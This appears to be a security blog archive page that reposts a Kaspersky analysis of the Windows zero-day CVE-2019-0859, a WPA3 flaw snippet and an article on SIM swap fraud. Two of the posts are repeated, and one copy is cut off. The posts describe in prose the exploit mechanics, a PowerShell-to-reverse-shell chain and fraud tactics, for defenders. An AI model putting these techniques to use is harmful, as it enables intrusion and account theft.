Category Archives: research

New zero-day vulnerability CVE-2019-0859 in win32k.sys

In March 2019, our automatic Exploit Prevention (EP) systems detected an attempt to exploit a vulnerability in the Microsoft Windows operating system. Further analysis of this event led to us discovering a zero-day vulnerability in win32k.sys. It was the fifth consecutive exploited Local Privilege Escalation vulnerability in Windows that we have discovered in recent months using our technologies. The previous ones were:

On March 17, 2019 we reported our discovery to Microsoft; the company confirmed the vulnerability and assigned it CVE-2019-0859. Microsoft have just released a patch, part of its update, crediting Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin.

Technical details

CVE-2019-0859 is a Use-After-Free vulnerability that is presented in the CreateWindowEx function. During execution CreateWindowEx sends the message WM_NCCREATE to the window when it’s first created. By using the SetWindowsHookEx function, it is possible to set a custom callback that can handle the WM_NCCREATE message right before calling the window procedure.

In win32k.sys all windows are presented by the tagWND structure which has an “fnid” field also known as Function ID. The field is used to define the class of a window; all windows are divided into classes such as ScrollBar, Menu, Desktop and many others. We have already written about Function ID related bugs.

During the WM_NCCREATE callback, the Function ID of a window is set to 0 and this allowed us to set extra data for the window from inside our hook. More importantly, we were able to change the address for the window procedure that was executed immediately after our hook. The change of window procedure to the menu window procedure leads to the execution of xxxMenuWindowProc and the function initiates Function ID to FNID_MENU because the current message is equal to WM_NCCREATE. But the most important part is that the ability to manipulate extra data prior to setting Function ID to FNID_MENU can force the xxxMenuWindowProc function to stop initialization of the menu and return FALSE. Because of that, sending of the NCCREATE message will be considered a failed operation and CreateWindowEx function will stop execution with a call to FreeWindow. Because our MENU-class window was not actually initialized, it allows us to gain control over the address of the memory block that is freed.

win32k!xxxFreeWindow+0x1344 on up-to-date Windows 7 SP1 x64

The exploit we found in the wild was targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10) and exploited the vulnerability using the well-known HMValidateHandle technique to bypass ASLR.

After a successful exploitation, the exploit executed PowerShell with a Base64 encoded command. The main aim of this command was to download a second-stage script from https//pastebin.com. The second stage PowerShell executes the final third stage, which is also a PowerShell script.

Third stage PowerShell script

The third script is very simple and does the following:

  • Unpacks shellcode
  • Allocates executable memory
  • Copies shellcode to allocated memory
  • Calls CreateThread to execute shellcode

Shellcode from PowerShell script

The main goal of the shellcode is to make a trivial HTTP reverse shell. This helps the attacker gain full control over the victim’s system.

Kaspersky Lab products detected this exploit proactively through the following technologies:

  1. Behavioral detection engine and Exploit Prevention for endpoint products;
  2. Advanced Sandboxing and Anti-Malware engine of the Kaspersky Anti Targeted Attack (KATA) platform.

Kaspersky Lab verdicts for the artifacts used in this and related attacks are:

  • HEUR:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic

Securelist: New zero-day vulnerability CVE-2019-0859 in win32k.sys

In March 2019, our automatic Exploit Prevention (EP) systems detected an attempt to exploit a vulnerability in the Microsoft Windows operating system. Further analysis of this event led to us discovering a zero-day vulnerability in win32k.sys. It was the fifth consecutive exploited Local Privilege Escalation vulnerability in Windows that we have discovered in recent months using our technologies. The previous ones were:

On March 17, 2019 we reported our discovery to Microsoft; the company confirmed the vulnerability and assigned it CVE-2019-0859. Microsoft have just released a patch, part of its update, crediting Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin.

Technical details

CVE-2019-0859 is a Use-After-Free vulnerability that is presented in the CreateWindowEx function. During execution CreateWindowEx sends the message WM_NCCREATE to the window when it’s first created. By using the SetWindowsHookEx function, it is possible to set a custom callback that can handle the WM_NCCREATE message right before calling the window procedure.

In win32k.sys all windows are presented by the tagWND structure which has an “fnid” field also known as Function ID. The field is used to define the class of a window; all windows are divided into classes such as ScrollBar, Menu, Desktop and many others. We have already written about Function ID related bugs.

During the WM_NCCREATE callback, the Function ID of a window is set to 0 and this allowed us to set extra data for the window from inside our hook. More importantly, we were able to change the address for the window procedure that was executed immediately after our hook. The change of window procedure to the menu window procedure leads to the execution of xxxMenuWindowProc and the function initiates Function ID to FNID_MENU because the current message is equal to WM_NCCREATE. But the most important part is that the ability to manipulate extra data prior to setting Function ID to FNID_MENU can force the xxxMenuWindowProc function to stop initialization of the menu and return FALSE. Because of that, sending of the NCCREATE message will be considered a failed operation and CreateWindowEx function will stop execution with a call to FreeWindow. Because our MENU-class window was not actually initialized, it allows us to gain control over the address of the memory block that is freed.

win32k!xxxFreeWindow+0x1344 on up-to-date Windows 7 SP1 x64

The exploit we found in the wild was targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10) and exploited the vulnerability using the well-known HMValidateHandle technique to bypass ASLR.

After a successful exploitation, the exploit executed PowerShell with a Base64 encoded command. The main aim of this command was to download a second-stage script from https//pastebin.com. The second stage PowerShell executes the final third stage, which is also a PowerShell script.

Third stage PowerShell script

The third script is very simple and does the following:

  • Unpacks shellcode
  • Allocates executable memory
  • Copies shellcode to allocated memory
  • Calls CreateThread to execute shellcode

Shellcode from PowerShell script

The main goal of the shellcode is to make a trivial HTTP reverse shell. This helps the attacker gain full control over the victim’s system.

Kaspersky Lab products detected this exploit proactively through the following technologies:

  1. Behavioral detection engine and Exploit Prevention for endpoint products;
  2. Advanced Sandboxing and Anti-Malware engine of the Kaspersky Anti Targeted Attack (KATA) platform.

Kaspersky Lab verdicts for the artifacts used in this and related attacks are:

  • HEUR:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic


Securelist

WPA3 design flaws affect security of new Wi-Fi standard

Researchers have discovered a number of design flaws affecting the security of the recently introduced WPA3 data transmission protocol. Collectively dubbed Dragonblood (because they affect WPA3’s Dragonfly handshake), they can be exploited to mount a DoS attack against a vulnerable access point or, more worryingly, to recover the password of a Wi-Fi network. “Attackers can then read information that WPA3 was assumed to safely encrypt. This can for example be abused to steal sensitive information … More

The post WPA3 design flaws affect security of new Wi-Fi standard appeared first on Help Net Security.

Large-scale SIM swap fraud

Introduction

SIM swap fraud is a type of account takeover fraud that generally targets a weakness in two-factor authentication and two-step verification, where the second factor or step is an SMS or a call placed to a mobile telephone. The fraud centers around exploiting a mobile phone operator’s ability to seamlessly port a telephone number to a new SIM. This feature is normally used when a customer has lost or had their phone stolen. Attacks like these are now widespread, with cybercriminals using them not only to steal credentials and capture OTPs (one-time passwords) sent via SMS but also to cause financial damage to victims.

If someone steals your phone number, you’ll face a lot of problems, especially because most of our modern two-factor authentication systems are based on SMSs that can be intercepted using this technique. Criminals can hijack your accounts one by one by having a password reset sent to your phone. They can trick automated systems – like your bank – into thinking they’re you when they call customer service. And worse, they can use your hijacked number to break into your work email and documents. And these attacks are possible because our financial life revolves around mobile apps that we use to send money, pay bills, etc.

Mobile payments are now huge in developing countries, especially in Africa and Latin America. Mobile phone-based money transfers allow users to access financing and micro-financing services, and to easily deposit, withdraw and pay for goods and services with a mobile device. In some cases, almost half the value of some African countries’ GDP goes through mobile phones. But nowadays these mobile payments are suffering a wave of attacks and people are losing their money – all powered by SIM swap fraud conducted on a major scale.

Like many other countries, Brazil and Mozambique had a high rate of SIM swap fraud. Both countries speak the same language (Portuguese) and were facing the same problem. By using social engineering, bribery, or even a simple phishing attack, fraudsters take control of customers’ phone numbers in order to receive mobile money transactions, or to collect the home banking OTPs to complete a transfer of funds or steal users’ money. In Mozambique this sort of crime was all over the national news, with the media questioning the integrity of the banks and mobile operators, suggesting they may be colluding in the scams. The reputation of the banks and operators was at stake; something urgent needed to do be done to protect their customers.

In Brazil the problem was affecting not only average citizens but also politicians, ministers, governors and high-profile businessmen. Online banking customers were also experiencing losses from their accounts. One organized gang alone in Brazil was able to SIM swap 5,000 victims. At Mozambique’s largest bank they had a monthly average of 17.2 cases of SIM swap fraud; the true impact nationwide is difficult to estimate as most banks don’t publicly share statistics. As was the case in Brazil, some of the victims were high-profile businessmen who had up to US$50,000 stolen from their bank accounts.

In Mozambique a nationwide push saw the operators and the banks sit down together and come up with a solution that drastically decreased the level of fraud. This new solution was designed locally, was surprisingly simple, but at the same time very effective; after the biggest and most popular bank in the country adopted it, there was an immediate reduction in the number of frauds. The Central Bank of Mozambique saw the potential of the platform and is considering making it mandatory for all banks.

In this article we’ll detail how very organized cybercrime developed their own ecosystem of fraud and how Mozambique was able to solve the problem of money being stolen in SIM swap fraud schemes, where mobile payments are an essential part of everyday life.

How the cybercriminals do it

The scam begins with a fraudster gathering details about the victim by using phishing emails, by buying information from organized crime groups, via social engineering or by obtaining the information following data leaks. Once the fraudster has obtained the necessary details they will then contact the victim’s mobile telephone provider. The fraudster uses social engineering techniques to convince the telephone company to port the victim’s phone number to the fraudster’s SIM, for example, by impersonating the victim and claiming they have lost their phone. They then ask for the number to be activated on a new SIM card.

After that the victim’s phone loses its connection to the network and the fraudster receives all the SMSs and voice calls intended for the victim. This allows the fraudster to intercept any one-time passwords sent via SMS or telephone calls made to the victim; all the services that rely on an SMS or telephone call authentication can then be used.

We have found that some of the processes used by mobile operators are weak and leave customers open to SIM swap attacks. For example, in some markets in order to validate your identity the operator may ask for some basic information such as full name, date of birth, the amount of the last top-up voucher, the last five numbers called, etc. Fraudsters can find some of this information on social media or by using apps such as TrueCaller to get the caller name based on the number. With a bit of social engineering they also try to guess the voucher amount based on what’s more popular in the local market. And what about the last five calls? One technique used by the fraudsters is to plant a few ‘missed calls’ or to send an SMS to the victim’s number as bait so that they call back.

Sometimes the target is the carrier, and not the customer. This happens when a carrier’s employees working in branches in small cities are sometimes unable to identify a fraudulent or adulterated document, especially branches located in kiosks or shopping malls, allowing a fraudster to activate a new SIM card. Another big problem is insiders, with some cybercriminals recruiting corrupt employees, paying them $10 to $15 per SIM card activated. The worst attacks occur when a fraudster sends a phishing email that aims to steal a carrier’s system credentials. Ironically, most of these systems don’t use two-factor authentication. Sometimes the goal of such emails is to install malware on the carrier’s network – all a fraudster needs is just one credential, even from a small branch from a small city, to give them access to the carrier’s system.

How much does a SIM swap of your number cost? It depends on how easy or hard it is to do. It’s easier with some carriers than others. A SIM swap for a famous celebrity or a politician can cost thousands of dollars. These are the prices stated on Brazilian underground forums, or occasionally on closed Facebook communities:

Carrier A Carrier B Carrier C Carrier D Carrier E
$10 $15 $20 $25 $40

The interest in such attacks is so great among cybercriminals that some of them decided to sell it as a service to others. Normally, a criminal can conduct an attack in two or three hours without much effort, because they already have access to the carrier’s system or an insider.

A Portuguese-speaking cybercriminal selling a SIM swap service. They call it ‘recover chip’…

Brazil has a very organized cybercrime scene, and it’s only natural that its actors will export their techniques and tactics to their fellow cybercriminals acting in other countries, especially in other Portuguese-speaking countries (Portugal, Mozambique, and Angola).

Falling victim – me too

The fraudsters fire in all directions; sometimes their attacks are targeted, sometimes they’re not. All a fraudster needs is your number, and it’s very easy to find it by searching through leaked databases, buying that database from data brokers (some of them are legal), or using apps like TrueCaller and other similar apps that offer caller ID and spam blocking, but which also have some privacy issues and a name-based search for subscribers. Sometimes your number can be found by simply doing a Google search.

The first sign that something is not quite right is when you lose your smartphone signal somewhere that normally has a strong signal. In a hotel last year while on a business trip my corporate smartphone suddenly lost its mobile connection, with no data or calls for about 30 minutes. I tried to solve the problem by connecting to any available network (I was using roaming so it wasn’t a problem), but all of them rejected my device:

As a final resort, I tried rebooting the device and connecting it again, with no success. After that I decided to call (using VoiP) the carrier I’m a customer of to find out what was going on. The operator told me someone had reported my number as “lost or stolen” and asked to activate it on another SIM card. This came as no surprise at all, because the number of victims in Brazil reporting the same problem is growing considerably. What was most surprising was the ease with which the employee gave me this information, as though it was nothing critical, suggesting it was a common occurrence for them. I immediately informed the operator about the ownership of the number, confirmed some personal information and the problem was quickly resolved.

Anyone can be a victim.

Brazil: extortion, WhatsApp and fintechs

WhatsApp is the most popular instant messenger in a number of countries where the app is used by Brazilian fraudsters to steal money in an attack known as ‘WhatsApp cloning’. After a SIM swap, the first thing the criminal does is to load WhatsApp and all the victim’s chats and contacts. Then they begin messaging the contacts in the victim’s name, citing an emergency and asking for money. In some cases, they feign a kidnapping situation, asking for an urgent payment – and some of the contacts will send money.

Brazilian TV has reported on several such cases, with one family losing US$3,000. Some of the attacks targeted companies, with executives supposedly contacting their financial departments asking for funds, when in fact it was fraudsters using WhatsApp accounts hijacked in a SIM swap. It’s like a BEC (Business E-mail Compromise) but using your WhatsApp account.

Extortion attacks via WhatsApp start with a SIM swap

The fintech boom in Brazil started with companies offering credit cards and bank accounts with no fees, especially after the successful launch of Nubank in 2013. Since then, similar solutions have emerged, such as Banco Inter, Next, Digio and Neon, most of them tied to a digital account. Most of them still rely on two-factor authentication via SMS. The ease with which a SIM swap can be performed helped fraudsters find new ways of emptying users’ banking accounts. That’s what happened to the customers of popular Brazilian fintech meupag!, according to a report by Gizmodo Brasil.

The fraudsters performed a SIM swap, activating the victim’s number on another SIM card. Then, on a smartphone with the pag! app installed, the fraudsters used the app’s password recovery function and a code was sent via SMS, allowing the bad guys to gain total control of the user’s account in the app. Once this access is obtained the fraudsters performed several illegal payments with the credit card issued in the app in the name of the victim. Some victims reported losses of US$3,300 in fraudulent transactions.

Mozambique: bribery, banks and a solution

Mobile payments are huge in African countries. Traditional banks are not accessible in rural areas where poor farmers would literally have to walk hundreds of kilometers to reach the closest branch. Mobile operators saw this gap and took the opportunity to invest and diversify their business into micro-finance services and reach areas where there is mobile coverage – all that’s required is a basic mobile phone.

Mobile payment systems like M-Pesa have made a huge impact in Africa. In Mozambique approximately US$5 billion per year is transacted through this platform which corresponds to approximately 41% of the country’s GDP, and in more mature and populated markets like Kenya it goes up to US$33 billion or 48% of the total GDP volume.

Most local banks rely on a one-time password (OTP), with many preferring not to use physical or software tokens as this increases the cost and complexity for customers, especially those on low incomes. The banks therefore try to keep it simple, using an SMS as the second factor. This shows that, perhaps without them even realizing it, they share the responsibility of securing their customers’ bank accounts with the mobile operators.

Mobile fraud on the rise

With financial inclusion services prospering in Africa, the flip side is that it opens a world of opportunities to fraudsters. The population’s technological literacy is very low, especially those on lower incomes. Remarkably, many of the fraudsters are prisoners who somehow have access to mobile phones and a lot of spare time on their hands.

Most SIM swap frauds operate in the same way. There are syndicates that identify and collude with employees from the banks and mobile operators. The bank employee is responsible for providing information about an account balance and detailed information about the victim. Armed with this information, the fraudsters conduct a phishing or SMmiShing attack to gain access to the victim’s online banking account and its verification codes.

In the second part of the attack, since the banks use SMS for their OTPs, the criminals need to conduct a SIM swap or SIM card hijacking to redirect all the victim’s communications to a new SIM card that’s in their possession. To achieve this, these syndicates rely on some cooperation from mobile operator employees, though the latter can be easily tracked down and detained. This is why the criminals mostly make use of forged documents that are required by the operator for the SIM swap and present them at mobile retail stores as part of a fraudulent request for a new SIM card. The staff at these stores often don’t have sufficient training to detect forged documents, and even if they do, sometimes the documents are authenticated by an official notary who has been bribed.

Since a phone number can only work on one SIM card at a time, the victim’s original SIM card is immediately blocked and, voilà, the fraudster now has control of the victim’s mobile communications.

The solution adopted in Mozambique

A nationwide push saw the operators and the banks sit down together and come up with a solution that drastically decreased the level of fraud. The new solution was designed locally, was surprisingly simple, but at the same time very effective; after the biggest and most popular bank in the country adopted it, there was a drastic reduction in the number of frauds. The Central Bank of Mozambique saw the potential of the platform and now wants to make it mandatory for all banks.

When a SIM card is hijacked there’s a good chance the fraudster will attempt to transfer funds from the bank account within minutes of the SIM swap to prevent the original owner from having enough time to complain to the mobile operator and regain control of the number.

After a subscriber’s number is blocked following a SIM swap, the victim usually thinks there’s a network problem and only when they realize that other people nearby still have a network connection do they decide to contact the call center from another phone or physically go to a retail shop to find out what is going on. There have been cases like Fabio’s above in which the fraudsters know the victim and wait until the target travels to another country so that it’s even harder for the person to go to a retail store and regain control of the mobile number. If the user has not turned on roaming, they typically only regain control of their numbers within one or two days.

How the solution works

All mobile operators in Mozambique made a platform available to the banks on a private API that flags up if there was a SIM swap involving a specific mobile number associated with a bank account over a predefined period. The bank then decides what to do next.

Most banks block any transaction from a mobile number that has undergone a SIM card change within the last 48 hours, while others opt for the longer period of 72 hours. This period of 48-72 hours is considered a safe period during which the subscriber will contact their operator if they have fallen victim to an unauthorized SIM card change.

There’s also the possibility that the mobile owner has legitimately changed their SIM card, and therefore unable to perform an online transaction for the next 48 hours. In such cases, some of the banks we spoke to have a process that requires face-to-face verification in a branch office – a reasonable compromise in the circumstances.

Platform workflow

  1. The banks are connected to different mobile operators through a VPN connection so that all traffic is secure.
  2. The online banking system conducts a REST API query to the respective mobile operator giving the mobile number (MSISDN) and the period (24-72 hours) as arguments.
  3. The mobile operator simply returns in real time: True or False.
  4. If the query is False, the bank allows the transaction as normal. If True, the bank blocks the transaction and may request additional steps to verify the transaction.

It is important to reiterate that the mobile operator does not share personal identifiable information (PII) with a third party, in this case banks. The national regulator for communications deemed the sharing of non-identifiable information by operators with the banks to be a case of national interest.

Once the platform was implemented, the level of online banking fraud stemming from SIM swap attacks fell dramatically, with almost no cases involving banks that have implemented the anti-SIM swap platform. As a result, we saw an increase of WhatsApp hijacking in Mozambique, similar to what happened in Brazil.

Conclusion: how not to be the next victim

Voice and SMS must be avoided as authenticity mechanisms

Mobile operators rely on legacy protocols for communication such as Signaling System No. 7, or SS7, which was initially developed in the 1970s. This protocol has security flaws that allow the interception of SMS messages or voice calls. By today’s standards the phone/SMS is no longer considered a secure method of authenticity if you want to protect high-value information such as bank accounts. An attack on Reddit in 2018 was a wake-up call for most companies.

The National Institute of Standards and Technology (NIST) in the USA explicitly deprecated the use of SMS for 2FA in a special publication, stating:

Verifiers SHOULD consider risk indicators such as device swap, SIM change, number porting, or other abnormal behavior before using the PSTN to deliver an out-of-band authentication secret.” (NIST 800-63B)

Some banks use software tokens that can be bound to a phone IMEI number (unique identifier); however, the difficult process of enrollment and maintaining changes, for example, when the user replaces the phone, deter many financial institutions.

When possible, we recommend users avoid two-factor authentication via SMS, opting instead for other ways, such as generating an OTP in a mobile app (like Google Authenticator) or using a physical token. Unfortunately, some online services don’t offer an alternative; in that case, the user needs to be aware of the risks.

The new era of biometrics

Some operators have implemented additional security mechanisms that require the user to authenticate through voice biometrics using a passphrase such as “my voice is my password” – the technology works reasonably well, even detecting if the voice is a recording, or if the user has flu. However, the major stumbling block that we observed is the very low enrollment base. Besides, it’s considered an expensive solution, especially for emerging markets, and requires some additional effort to integrate with backend systems.

Automated SMS: “Your number will be deactivated from this SIM card.”

When a SIM change is requested, operators can implement an automated message that’s sent to the number alerting the owner that there’s been a SIM change request and if it’s not authorized, the subscriber must contact the fraud hotline. This will not prevent the hijacking itself, it will instead alert the subscriber so that they can respond faster in the case of malicious activity. The main drawback is that the subscriber may be outside the coverage area.

Some carriers have implemented an additional layer of confirmation for any case of SIM activation, offering the option of configuring a password in their systems. This password will be required for any changes associated with your number, such as big changes in your monthly bill or even when you need a new SIM card. Talk to your carrier to check if they already offer this additional security for your number.

Process improvement

As we mentioned above, some processes contain weaknesses, especially in emerging markets. It’s important to dissect all the stages of the process and understand what the underlying weaknesses are. In the case of Mozambique, there’s a thriving black market that makes it possible to obtain fake documents. These documents can then be presented to operators as proof of identity for SIM swaps.

Activate 2FA on WhatsApp

To avoid WhatsApp hijacking, it’s of paramount importance to activate 2FA using a six-digit PIN on your device. In the event of hijacking, you’ll have another layer of security that is not so easy to bypass.

Request your number be unlisted from TrueCaller and similar apps

TrueCaller is a crowdsourced phone book. It allows people to be identified through their mobile number. However, as we mentioned before, fraudsters use this tool to find out more information about you. You can, and should, request that your number is unlisted from this global phone book.

Despite the fact that attacks on 2FA with the use of tools such as Evilginx are becoming more sophisticated, software tokens still provide a reasonable level of security by today’s standards. Whilst there is no silver bullet solution, we believe that declaring the death of SMS-based 2FA is the way to go. This is especially true when it comes to online banking, social media and email services.

Securelist: Large-scale SIM swap fraud

Introduction

SIM swap fraud is a type of account takeover fraud that generally targets a weakness in two-factor authentication and two-step verification, where the second factor or step is an SMS or a call placed to a mobile telephone. The fraud centers around exploiting a mobile phone operator’s ability to seamlessly port a telephone number to a new SIM. This feature is normally used when a customer has lost or had their phone stolen. Attacks like these are now widespread, with cybercriminals using them not only to steal credentials and capture OTPs (one-time passwords) sent via SMS but also to cause financial damage to victims.

If someone steals your phone number, you’ll face a lot of problems, especially because most of our modern two-factor authentication systems are based on SMSs that can be intercepted using this technique. Criminals can hijack your accounts one by one by having a password reset sent to your phone. They can trick automated systems – like your bank – into thinking they’re you when they call customer service. And worse, they can use your hijacked number to break into your work email and documents. And these attacks are possible because our financial life revolves around mobile apps that we use to send money, pay bills, etc.

Mobile payments are now huge in developing countries, especially in Africa and Latin America. Mobile phone-based money transfers allow users to access financing and micro-financing services, and to easily deposit, withdraw and pay for goods and services with a mobile device. In some cases, almost half the value of some African countries’ GDP goes through mobile phones. But nowadays these mobile payments are suffering a wave of attacks and people are losing their money – all powered by SIM swap fraud conducted on a major scale.

Like many other countries, Brazil and Mozambique had a high rate of SIM swap fraud. Both countries speak the same language (Portuguese) and were facing the same problem. By using social engineering, bribery, or even a simple phishing attack, fraudsters take control of customers’ phone numbers in order to receive mobile money transactions, or to collect the home banking OTPs to complete a transfer of funds or steal users’ money. In Mozambique this sort of crime was all over the national news, with the media questioning the integrity of the banks and mobile operators, suggesting they may be colluding in the scams. The reputation of the banks and operators was at stake; something urgent needed to do be done to protect their customers.

In Brazil the problem was affecting not only average citizens but also politicians, ministers, governors and high-profile businessmen. Online banking customers were also experiencing losses from their accounts. One organized gang alone in Brazil was able to SIM swap 5,000 victims. At Mozambique’s largest bank they had a monthly average of 17.2 cases of SIM swap fraud; the true impact nationwide is difficult to estimate as most banks don’t publicly share statistics. As was the case in Brazil, some of the victims were high-profile businessmen who had up to US$50,000 stolen from their bank accounts.

In Mozambique a nationwide push saw the operators and the banks sit down together and come up with a solution that drastically decreased the level of fraud. This new solution was designed locally, was surprisingly simple, but at the same time very effective; after the biggest and most popular bank in the country adopted it, there was an immediate reduction in the number of frauds. The Central Bank of Mozambique saw the potential of the platform and is considering making it mandatory for all banks.

In this article we’ll detail how very organized cybercrime developed their own ecosystem of fraud and how Mozambique was able to solve the problem of money being stolen in SIM swap fraud schemes, where mobile payments are an essential part of everyday life.

How the cybercriminals do it

The scam begins with a fraudster gathering details about the victim by using phishing emails, by buying information from organized crime groups, via social engineering or by obtaining the information following data leaks. Once the fraudster has obtained the necessary details they will then contact the victim’s mobile telephone provider. The fraudster uses social engineering techniques to convince the telephone company to port the victim’s phone number to the fraudster’s SIM, for example, by impersonating the victim and claiming they have lost their phone. They then ask for the number to be activated on a new SIM card.

After that the victim’s phone loses its connection to the network and the fraudster receives all the SMSs and voice calls intended for the victim. This allows the fraudster to intercept any one-time passwords sent via SMS or telephone calls made to the victim; all the services that rely on an SMS or telephone call authentication can then be used.

We have found that some of the processes used by mobile operators are weak and leave customers open to SIM swap attacks. For example, in some markets in order to validate your identity the operator may ask for some basic information such as full name, date of birth, the amount of the last top-up voucher, the last five numbers called, etc. Fraudsters can find some of this information on social media or by using apps such as TrueCaller to get the caller name based on the number. With a bit of social engineering they also try to guess the voucher amount based on what’s more popular in the local market. And what about the last five calls? One technique used by the fraudsters is to plant a few ‘missed calls’ or to send an SMS to the victim’s number as bait so that they call back.

Sometimes the target is the carrier, and not the customer. This happens when a carrier’s employees working in branches in small cities are sometimes unable to identify a fraudulent or adulterated document, especially branches located in kiosks or shopping malls, allowing a fraudster to activate a new SIM card. Another big problem is insiders, with some cybercriminals recruiting corrupt employees, paying them $10 to $15 per SIM card activated. The worst attacks occur when a fraudster sends a phishing email that aims to steal a carrier’s system credentials. Ironically, most of these systems don’t use two-factor authentication. Sometimes the goal of such emails is to install malware on the carrier’s network – all a fraudster needs is just one credential, even from a small branch from a small city, to give them access to the carrier’s system.

How much does a SIM swap of your number cost? It depends on how easy or hard it is to do. It’s easier with some carriers than others. A SIM swap for a famous celebrity or a politician can cost thousands of dollars. These are the prices stated on Brazilian underground forums, or occasionally on closed Facebook communities:

Carrier A Carrier B Carrier C Carrier D Carrier E
$10 $15 $20 $25 $40

The interest in such attacks is so great among cybercriminals that some of them decided to sell it as a service to others. Normally, a criminal can conduct an attack in two or three hours without much effort, because they already have access to the carrier’s system or an insider.

A Portuguese-speaking cybercriminal selling a SIM swap service. They call it ‘recover chip’…

Brazil has a very organized cybercrime scene, and it’s only natural that its actors will export their techniques and tactics to their fellow cybercriminals acting in other countries, especially in other Portuguese-speaking countries (Portugal, Mozambique, and Angola).

Falling victim – me too

The fraudsters fire in all directions; sometimes their attacks are targeted, sometimes they’re not. All a fraudster needs is your number, and it’s very easy to find it by searching through leaked databases, buying that database from data brokers (some of them are legal), or using apps like TrueCaller and other similar apps that offer caller ID and spam blocking, but which also have some privacy issues and a name-based search for subscribers. Sometimes your number can be found by simply doing a Google search.

The first sign that something is not quite right is when you lose your smartphone signal somewhere that normally has a strong signal. In a hotel last year while on a business trip my corporate smartphone suddenly lost its mobile connection, with no data or calls for about 30 minutes. I tried to solve the problem by connecting to any available network (I was using roaming so it wasn’t a problem), but all of them rejected my device:

As a final resort, I tried rebooting the device and connecting it again, with no success. After that I decided to call (using VoiP) the carrier I’m a customer of to find out what was going on. The operator told me someone had reported my number as “lost or stolen” and asked to activate it on another SIM card. This came as no surprise at all, because the number of victims in Brazil reporting the same problem is growing considerably. What was most surprising was the ease with which the employee gave me this information, as though it was nothing critical, suggesting it was a common occurrence for them. I immediately informed the operator about the ownership of the number, confirmed some personal information and the problem was quickly resolved.

Anyone can be a victim.

Brazil: extortion, WhatsApp and fintechs

WhatsApp is the most popular instant messenger in a number of countries where the app is used by Brazilian fraudsters to steal money in an attack known as ‘WhatsApp cloning’. After a SIM swap, the first thing the criminal does is to load WhatsApp and all the victim’s chats and contacts. Then they begin messaging the contacts in the victim’s name, citing an emergency and asking for money. In some cases, they feign a kidnapping situation, asking for an urgent payment – and some of the contacts will send money.

Brazilian TV has reported on several such cases, with one family losing US$3,000. Some of the attacks targeted companies, with executives supposedly contacting their financial departments asking for funds, when in fact it was fraudsters using WhatsApp accounts hijacked in a SIM swap. It’s like a BEC (Business E-mail Compromise) but using your WhatsApp account.

Extortion attacks via WhatsApp start with a SIM swap

The fintech boom in Brazil started with companies offering credit cards and bank accounts with no fees, especially after the successful launch of Nubank in 2013. Since then, similar solutions have emerged, such as Banco Inter, Next, Digio and Neon, most of them tied to a digital account. Most of them still rely on two-factor authentication via SMS. The ease with which a SIM swap can be performed helped fraudsters find new ways of emptying users’ banking accounts. That’s what happened to the customers of popular Brazilian fintech meupag!, according to a report by Gizmodo Brasil.

The fraudsters performed a SIM swap, activating the victim’s number on another SIM card. Then, on a smartphone with the pag! app installed, the fraudsters used the app’s password recovery function and a code was sent via SMS, allowing the bad guys to gain total control of the user’s account in the app. Once this access is obtained the fraudsters performed several illegal payments with the credit card issued in the app in the name of the victim. Some victims reported losses of US$3,300 in fraudulent transactions.

Mozambique: bribery, banks and a solution

Mobile payments are huge in African countries. Traditional banks are not accessible in rural areas where poor farmers would literally have to walk hundreds of kilometers to reach the closest branch. Mobile operators saw this gap and took the opportunity to invest and diversify their business into micro-finance services and reach areas where there is mobile coverage – all that’s required is a basic mobile phone.

Mobile payment systems like M-Pesa have made a huge impact in Africa. In Mozambique approximately US$5 billion per year is transacted through this platform which corresponds to approximately 41% of the country’s GDP, and in more mature and populated markets like Kenya it goes up to US$33 billion or 48% of the total GDP volume.

Most local banks rely on a one-time password (OTP), with many preferring not to use physical or software tokens as this increases the cost and complexity for customers, especially those on low incomes. The banks therefore try to keep it simple, using an SMS as the second factor. This shows that, perhaps without them even realizing it, they share the responsibility of securing their customers’ bank accounts with the mobile operators.

Mobile fraud on the rise

With financial inclusion services prospering in Africa, the flip side is that it opens a world of opportunities to fraudsters. The population’s technological literacy is very low, especially those on lower incomes. Remarkably, many of the fraudsters are prisoners who somehow have access to mobile phones and a lot of spare time on their hands.

Most SIM swap frauds operate in the same way. There are syndicates that identify and collude with employees from the banks and mobile operators. The bank employee is responsible for providing information about an account balance and detailed information about the victim. Armed with this information, the fraudsters conduct a phishing or SMmiShing attack to gain access to the victim’s online banking account and its verification codes.

In the second part of the attack, since the banks use SMS for their OTPs, the criminals need to conduct a SIM swap or SIM card hijacking to redirect all the victim’s communications to a new SIM card that’s in their possession. To achieve this, these syndicates rely on some cooperation from mobile operator employees, though the latter can be easily tracked down and detained. This is why the criminals mostly make use of forged documents that are required by the operator for the SIM swap and present them at mobile retail stores as part of a fraudulent request for a new SIM card. The staff at these stores often don’t have sufficient training to detect forged documents, and even if they do, sometimes the documents are authenticated by an official notary who has been bribed.

Since a phone number can only work on one SIM card at a time, the victim’s original SIM card is immediately blocked and, voilà, the fraudster now has control of the victim’s mobile communications.

The solution adopted in Mozambique

A nationwide push saw the operators and the banks sit down together and come up with a solution that drastically decreased the level of fraud. The new solution was designed locally, was surprisingly simple, but at the same time very effective; after the biggest and most popular bank in the country adopted it, there was a drastic reduction in the number of frauds. The Central Bank of Mozambique saw the potential of the platform and now wants to make it mandatory for all banks.

When a SIM card is hijacked there’s a good chance the fraudster will attempt to transfer funds from the bank account within minutes of the SIM swap to prevent the original owner from having enough time to complain to the mobile operator and regain control of the number.

After a subscriber’s number is blocked following a SIM swap, the victim usually thinks there’s a network problem and only when they realize that other people nearby still have a network connection do they decide to contact the call center from another phone or physically go to a retail shop to find out what is going on. There have been cases like Fabio’s above in which the fraudsters know the victim and wait until the target travels to another country so that it’s even harder for the person to go to a retail store and regain control of the mobile number. If the user has not turned on roaming, they typically only regain control of their numbers within one or two days.

How the solution works

All mobile operators in Mozambique made a platform available to the banks on a private API that flags up if there was a SIM swap involving a specific mobile number associated with a bank account over a predefined period. The bank then decides what to do next.

Most banks block any transaction from a mobile number that has undergone a SIM card change within the last 48 hours, while others opt for the longer period of 72 hours. This period of 48-72 hours is considered a safe period during which the subscriber will contact their operator if they have fallen victim to an unauthorized SIM card change.

